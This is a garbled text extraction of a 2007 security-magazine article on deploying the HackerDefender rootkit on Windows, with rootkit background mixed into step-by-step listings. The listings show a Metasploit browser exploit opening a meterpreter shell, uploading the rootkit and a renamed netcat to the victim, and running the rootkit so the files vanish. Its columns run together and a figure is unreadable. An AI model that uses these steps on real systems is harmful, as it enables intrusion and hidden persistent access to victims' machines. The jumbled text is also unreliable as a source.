HackerDefender Rootkit for the Masses Attack Chris Gates, CISSP, GCIH, C|EH, CPTS Diffi culty Every month attackers are handed the latest 0-day exploit on a silver platter. There are tons of sites that post the latest exploit and security professionals rush to see exactly how the new exploit can be used to gain access to a remote computer. ut simply gaining access to a system one how to actually use and deploy the rootkit. is not the main goal of the new type of My intention is to teach the reader how to set B organized attackers whose desire is to up a basic HackerDefender confi guration fi le, command their victims to do their bidding. It is and show a couple of easy methods to get the said in the security business that getting a shell rootkit on the victim’s machine. I will fi nish things on a box is easy, but keeping that shell is where off with how to interact with the rootkit using the real skill is at. There are several popular the backdoor client and a couple of backdoors methods of keeping access such as creating that were set up in the rootkit confi guration fi le. accounts, cracking passwords, trojans, back- I won’t be going too deeply into rootkit basics or doors and of course rootkits. In this article we theory, current state of rootkit advancements, or are going to discuss rootkits basics and focus recovery from a rootkit level compromise. What specifi cally on using the HackerDefender[1] we will cover is actually deploying and interacting rootkit for Windows. Before we start lets quickly cover who I am and what I hope to accomplish with this article. What will you learn... I am not a rootkit writer or developer. I am se- • How to use Hacker Defender rootkit curity consultant, and I teach security courses. • Hiding fi les, processes, & registry keys I have taken and taught numerous hacking • Using the backdoor client. courses and hold several hacking certificertifi caca-- tions. Most of these courses sum up rootkits in a couple of paragraphs with links to the rootkit’s What you should know... homepage and tell you to basically fi gure it out for yourself. Time and time again I have watched • How to use Windows and the Windows fi le sys- really motivated students come to a screeching tem halt when it comes time to work with rootkits, • The basics of Windows rootkits because the documentation that is publicly • Windows command line. available does a horrible job at teaching some- 2 hakin9 6/2007 www.hakin9.org/en Rootkit with the rootkit once the initial system compromise has taken place. I will Listing 1. Running a clients-side exploit and getting our meterpreter attempt to point the reader to further shell resources on topics outside the basic SegFault:~/framework-3.0/framework-dev CG$ ./msfconsole ____________ scope of this article. Our goal is to < metasploit > help the reader with the So, now what do I do? question after downloading ------------ HackerDefender. \ ,__, \ (oo)____ (__) )\ An overview of Rootkits ||--|| * The shortest defi nition of a rootkit =[ msf v3.1-dev is software that allows an attacker + – --=[ 201 exploits – 106 payloads to mask his presence on a system + – --=[ 17 encoders – 5 nops while allowing the attacker access to =[ 39 aux msf > use exploit/windows/browser/logitech_videocall_removeimage the system at a later time. The term msf exploit(logitech_videocall_removeimage) > set TARGET 0 rootkit originally referred to a collec- TARGET => 0 tion of tools used to gain and keep msf exploit(logitech_videocall_removeimage) > set PAYLOAD windows/ administrative access on UNIX sys- meterpreter/bind_tcp tems. These tools usually included PAYLOAD => windows/meterpreter/bind_tcp msf exploit(logitech_videocall_removeimage) > set URIPATH hakin9/ trojaned or modifi ed copies of im- URIPATH => hakin9/ portant system binaries that were msf exploit(logitech_videocall_removeimage) > exploit modifi ed to hide the actions of an [*] Using URL: http://192.168.0.100:8080/hakin9/ unauthorized user from the system [*] Server started. administrators. With Microsoft Win- [*] Exploit running as background job. msf exploit(logitech_videocall_removeimage) > dows, rootkits have a narrower defi - [*] Started bind handler nition. Rootkits in Windows refers to [*] Transmitting intermediate stager for over-sized stage...(89 bytes) programs that use system hooking or [*] Sending stage (2834 bytes) modifi cation to hide fi les, processes, [*] Sleeping before handling stage... registry keys, and other objects in or- [*] Uploading DLL (81931 bytes)... [*] Upload completed. der to hide programs and behaviors. [*] Meterpreter session 1 opened (192.168.0.100:53985 -> 192.168.0.114:4444) In particular, Windows rootkits do not msf exploit(logitech_videocall_removeimage) > sessions -i 1 necessarily include any functionality [*] Starting interaction with 1... to gain administrative privileges. In meterpreter > fact, many Windows rootkits require Listing 2. Uploading our HackerDefender.exe, HackerDefender.ini, and administrative privileges to even renamed netcat via function [2]. Metasploit’s meterpreter meterpreter > pwd It is important to note that rootkits C:\WINDOWS\system32 are not exploits. Rather, rootkits are meterpreter > cd .. used after the initial exploit to main- meterpreter > cd Help tain access. It is generally not the meterpreter > pwd payload of an exploit, but it may be C:\WINDOWS\Help meterpreter > mkdir hxdef the end result of the attack. Creating directory: hxdef Rootkits, once installed, can: meterpreter > cd hxdef meterpreter > pwd • Hide processes C:\WINDOWS\Help\hxdef • Hide fi les and their contents meterpreter > upload hxdef100.exe hxdef100.exe [*] uploading : hxdef100.exe -> hxdef100.exe • Hide registry keys and their con- [*] uploaded : hxdef100.exe -> hxdef100.exe tents meterpreter > upload hxdef100.ini hxdef100.ini • Hide open ports and communica- [*] uploading : hxdef100.ini -> hxdef100.ini tion channels [*] uploaded : hxdef100.ini -> hxdef100.ini • Capture keyboard strokes (key meterpreter > cd .. meterpreter > cd .. logger) meterpreter > cd system32 • Sniff passwords in a local area meterpreter > upload mstftp.exe mstftp.exe network [*] uploading : mstftp.exe -> mstftp.exe [*] uploaded : mstftp.exe -> mstftp.exe Rootkits can be broken down into meterpreter > two general categories, because www.hakin9.org/en hakin9 6/2007 3 Attack they can operate at two different Listing 3. Running HackerDefender and seeing that the fi les are now levels: user mode (application) and hidden even to meterpreter kernel rootkits. meterpreter > cd Help meterpreter > cd hxdef meterpreter > pwd User mode rootkits C:\WINDOWS\Help\hxdef User mode rootkits involve system hooking or intercepting API calls in meterpreter > ls the user or application space. When- ever an application makes a system Listing: C:\WINDOWS\Help\hxdef call, the execution of that system call ================= follows a predetermined path. A Win- Mode Size Type Last modifi ed Name dows rootkit can hijack the system call ---- ---- ---- ------------- ---- at many points along that path and 40777/rwxrwxrwx 0 dir Wed Dec 31 17:00:00 MST 1969 . inject or change the values of those .. system calls to hide its presence. 100777/rwxrwxrwx 70656 fi l Wed Dec 31 17:00:00 MST 1969 hxdef100.exe 100666/rw-rw-rw- 4119 fi l Wed Dec 31 17:00:00 MST 1969 hxdef100.ini Examples of user mode rootkits are: HE4Hook [3], Vanquish [4], and meterpreter > execute -f hxdef100.exe HackerDefender. Process 1700 created. meterpreter > pwd C:\WINDOWS\Help\hxdef Kernel mode rootkits meterpreter > ls While all user mode rootkits change the behavior of the operating system Listing: C:\WINDOWS\Help\hxdef by hooking API functions or replac- ============================== ing core system commands, kernel based rootkits may change the Mode Size Type Last modifi ed Name ---- ---- ---- ------------- ---- behavior of the operating system or 40777/rwxrwxrwx 0 dir Wed Dec 31 17:00:00 MST 1969 . modify some kernel data structures .. by system hooking or modifi cation in kernel space. It is important to note meterpreter > that, before modifying a kernel, an at- tacker has to gain an access to kernel ������������ �������� ���������� ���������������� ����������� ��������������� ������� �������� ��������������� ��������������� �������� �������������������������� �������������������� �������������� ���������� ������������������ ������������� ��������������� ����������� ������ ��������� ��������� ������ ������������ ������������������������� ��������������������������������� ���� ������ ����� �������� ������� ��� ������ ������ ���������� ������� ������ ������� ��������� ��������� ����� ������� ������� ���� ��������� ������ ����� ���������� ���� ������� ��� �������� �������� �������� ������� ������ ������� ��������������������������� ����������������������������������� Figure 1. User Mode space and Kernel Mode space under Windows 4 hakin9 6/2007 www.hakin9.org/en Rootkit memory. Kernel space is generally memory. Hooking at the kernel level level applications rely on the kernel to off-limits to non-system level users. is the ideal place for system hooking pass them information, if you control One must have the appropriate rights and for evading detection, because it the information that is passed to in order to view or modify kernel is at the lowest level. Because upper them, you can easily hide information and processes. A common technique for hiding the presence of a malware's process is to remove the process from the kernel's list of active proc- esses. Since process management APIs rely on the
Details
-
File Typepdf
-
Upload Time-
-
Content LanguagesEnglish
-
Upload UserAnonymous/Not logged-in
-
File Pages11 Page
-
File Size-